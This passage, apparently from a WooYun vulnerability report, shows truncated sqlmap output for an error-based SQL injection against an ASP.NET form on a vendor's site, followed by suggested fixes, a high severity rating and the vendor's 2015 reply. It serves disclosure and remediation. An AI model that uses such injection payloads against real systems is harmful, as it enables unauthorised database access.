odifyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$s
cLeft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$b
tnQuery&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8WBB4KUXVlcnlTdGF0ZQs
pZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnRpdHksIFZlcnNpb249MS4
wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCB

漏洞证明:

如上

修复方案:

修改后台密码
修改权限
防注入

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-08-31 12:11

厂商回复:

此系统还在测试阶段,非常感谢您的提醒.

最新状态:

暂无